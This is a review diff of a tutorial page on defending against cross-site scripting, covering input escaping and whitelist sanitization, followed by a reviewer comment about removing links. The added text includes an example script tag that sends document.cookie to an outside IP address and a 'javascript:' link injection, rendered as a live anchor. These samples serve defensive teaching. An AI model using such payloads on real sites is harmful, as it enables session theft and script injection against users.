contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -76,35 +99,102 @@ However, that also means that hackers are able to also include scripts in their
 common ways are:
 
-* Escaping String Input: By converting legal HTML characters to their
+**Escaping String Input** <br>
+By converting legal HTML characters to their
 display-equivalent (e.g. `<` to `&lt;`), you prevent the symbol from being
 parsed as HTML. It now even shows the content on the screen (in case the actual
 intention is to actually show someone how to code for example).
+In the above example, the comment section will become like this: 
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph! <br>
+I **like** your photograph! <br>
+This is an innocent looking comment. `<script>sendToServer("http://139.241.0.3/", document.cookie)</script>`
+
+The `<script>` and `</script>` will be displayed as text rather than being run as `JavaScript` by the browser.
 
-* Whitelist Sanitization: By scanning and parsing the input as HTML, you can
+**Whitelist Sanitization** <br>
+By scanning and parsing the input as HTML, you can
 remove undesired HTML elements, and only allowing certain whitelisted HTML
 elements to be used (e.g. whitelisting only `<b>` and `<i>`).
 
+*Note that these two ways alone are not enough to protect your web application against XSS attacks. Sophisticated attacks will make use of the different possible user inputs to inject code or illegal characters that are not limited to `<script>...</script>`. It is important to note where the user input is going to be generated in the output.*
+
+For example, if you are building a profile page and allow user to add their own links to certain buttons:
+
+`<a href="{user input link}">...</a>`
+
+If a malicious user submits the following as input: 
+
+`javascript:alert("XSS!")`
+
+It will result in the button running the javascript code when pressed → <a href="javascript:alert('XSS!')"><span class="glyphicon glyphicon-user"></span></a> 
+
+You can also consider using XSS scanning tools to check whether your web application is vulnerable. Below are links of some open-source XSS scanning tools: 
+
+1. http://wapiti.sourceforge.net/ (Web Application Vulnerability Scanner)
+1. http://w3af.org/ (Web Application Attack and Audit Framework)
+1. https://www.arachni-scanner.com/ (Web Application Security Scanner Framework)
+
+## Where to go from here?
+
+Although XSS is the most common web application vulnerability, there are also many other types of vulnerabilities. It is important to be aware of them to properly secure your web application. Here is a statistical 
+<a href="https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-application-attacks-2018-eng.pdf" target="_blank">report</a> on web application vulnerabilities and a graphical summary retrieved from it: 
+
+![Graphical Statistic](./Images/StatisticGraphic.png)
+
+Here, you can see many other web application security vulnerabilities. You can learn about SQL Injection [here](../sqlInjection.html) and Cross Site Request Forgery [here](../crossSiteRequestForgery/crossSiteRequestForgery.html).
```

Comment:
Maybe avoid these links? Just mention other types of vulnerabilities instead? reason: this book is evolving fast and these links can change in future.

Reply:
Removed this sentence